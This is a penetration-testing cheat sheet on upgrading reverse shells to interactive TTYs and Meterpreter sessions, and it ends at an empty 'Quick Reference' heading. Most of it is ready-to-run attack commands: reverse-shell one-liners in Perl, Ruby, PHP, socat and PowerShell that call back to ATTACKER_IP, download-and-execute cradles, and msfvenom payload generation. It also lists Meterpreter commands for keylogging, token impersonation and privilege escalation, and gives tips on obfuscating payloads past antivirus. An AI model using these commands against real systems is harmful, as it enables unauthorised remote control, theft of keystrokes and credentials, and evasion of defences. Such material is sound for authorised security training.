Shell Upgrade Techniques

Introduction

During penetration testing, the initial shell you receive after exploitation is often limited in functionality (non-interactive). This document covers techniques to upgrade these basic shells to fully interactive TTYs and Meterpreter sessions for enhanced post-exploitation capabilities.

Basic Shell Limitations

Initial reverse shells typically have limitations:

• No tab completion
• No command history
• No arrow key functionality
• Cannot use interactive commands (su, ssh, vim)
• Unstable (can break with Ctrl+C)
• Limited environment variables

Upgrading Basic Shells to Interactive TTYs

Python PTY Method

# Python 2.x
python -c 'import pty; pty.spawn("/bin/bash")'

# Python 3.x
python3 -c 'import pty; pty.spawn("/bin/bash")'

# Then stabilize the shell
export TERM=xterm
# Press Ctrl+Z to background the shell
stty raw -echo; fg
# Press Enter twice
reset

# Optional: Adjust terminal size
stty rows 38 columns 116

Using Socat

# On attacker machine - serve the socat binary if needed
python3 -m http.server 8000

# On target - download and use socat for a full TTY shell
wget http://ATTACKER_IP:8000/socat -O /tmp/socat
chmod +x /tmp/socat
/tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:ATTACKER_IP:4444

# Attacker listener for socat
socat file:`tty`,raw,echo=0 tcp-listen:4444

Using ConPtyShell (Windows)

# On attacker machine (Linux):
stty raw -echo; (stty size; cat) | nc -lvnp 4444

# On victim machine (Windows):
IEX(IWR https://raw.githubusercontent.com/antonioCoco/ConPtyShell/master/Invoke-ConPtyShell.ps1 -UseBasicParsing); Invoke-ConPtyShell 10.0.0.1 4444

Other Upgrade Methods

Using script command (Linux)

script -q /dev/null /bin/bash

Using stty (Linux)

/bin/sh -i
# Background with CTRL+Z
stty raw -echo
fg
reset

Using rlwrap

# On attacker machine
rlwrap nc -lvnp 4444

Upgrading to Meterpreter

Using Metasploit shell_to_meterpreter

# In Metasploit, after getting a basic shell:
use post/multi/manage/shell_to_meterpreter
set SESSION 1  # Replace with your session ID
set LHOST ATTACKER_IP
set LPORT 4433
run

Direct Meterpreter Payload Execution

# Generate a meterpreter payload
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=ATTACKER_IP LPORT=4444 -f elf > meterpreter.elf
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=ATTACKER_IP LPORT=4444 -f exe > meterpreter.exe

# Set up handler in Metasploit
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp  # Or linux/x86/meterpreter/reverse_tcp
set LHOST ATTACKER_IP
set LPORT 4444
run

# Transfer and execute on target
# Linux:
chmod +x meterpreter.elf
./meterpreter.elf

# Windows:
.\meterpreter.exe

One-liner PowerShell Meterpreter

# Generate PowerShell payload
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=ATTACKER_IP LPORT=4444 -f psh -o payload.ps1

# Execute on target (options)
powershell -ep bypass -f payload.ps1
powershell -ep bypass -c "IEX(New-Object Net.WebClient).DownloadString('http://ATTACKER_IP/payload.ps1')"

Platform-Specific Techniques

Linux Shell Upgrade

# Check for Python versions
which python python2 python3

# Check for other interpreters
which perl ruby php

# Perl approach
perl -e 'use Socket;$i="ATTACKER_IP";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/bash -i");};'

# Ruby approach
ruby -rsocket -e'f=TCPSocket.open("ATTACKER_IP",4444).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

# PHP approach
php -r '$sock=fsockopen("ATTACKER_IP",4444);exec("/bin/sh -i <&3 >&3 2>&3");'

Windows Shell Upgrade

# PowerShell one-liner upgrade
powershell -ep bypass "IEX(New-Object Net.WebClient).DownloadString('http://ATTACKER_IP/Invoke-PowerShellTcp.ps1'); Invoke-PowerShellTcp -Reverse -IPAddress ATTACKER_IP -Port 4444"

# Native Windows technique
msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKER_IP LPORT=4444 -f exe > shell.exe

Meterpreter Post-Exploitation Commands

# System information
sysinfo
getuid
getprivs

# Session management
background  # Background the current session
sessions -i 1  # Resume session 1

# Privilege escalation
getsystem
migrate PID  # Migrate to another process

# Token impersonation
use incognito
list_tokens -u
impersonate_token "DOMAIN\\User"

# File operations
download C:\\important.txt /tmp/
upload shell.exe C:\\Windows\\Tasks\\

# Network operations
portfwd add -l 3389 -p 3389 -r target  # Port forwarding
route add 192.168.1.0 255.255.255.0 1  # Routing through session

# Keylogging
keyscan_start
keyscan_dump
keyscan_stop

# Screenshot
screenshot

# Shell access
shell  # Get system shell

Troubleshooting Common Issues

Reverse Shell Not Connecting

• Check firewall rules on both systems
• Verify network connectivity
• Try different ports (80, 443, 8080, 53)
• Use encrypted channels if detection is a concern

Unstable Shell Issues

• Use proper shell upgrade techniques
• Check terminal emulation compatibility
• For large outputs, redirect to a file then download

Shell Dying After Upgrade

• Try different upgrade methods
• Check system resource limitations
• Use nohup or disown to prevent termination

Windows Antivirus Blocking

• Use obfuscated payloads
• Consider in-memory execution techniques
• Use encrypted/encoded payloads

OPSEC Considerations

1. Limited Command Execution: Execute only necessary commands
2. Clean Up: Remove uploaded files when finished
3. Process Migration: Migrate to stable, long-running processes
4. Log Awareness: Be aware of logs generated by your activities
5. Session Management: Close sessions properly when done

Quick Reference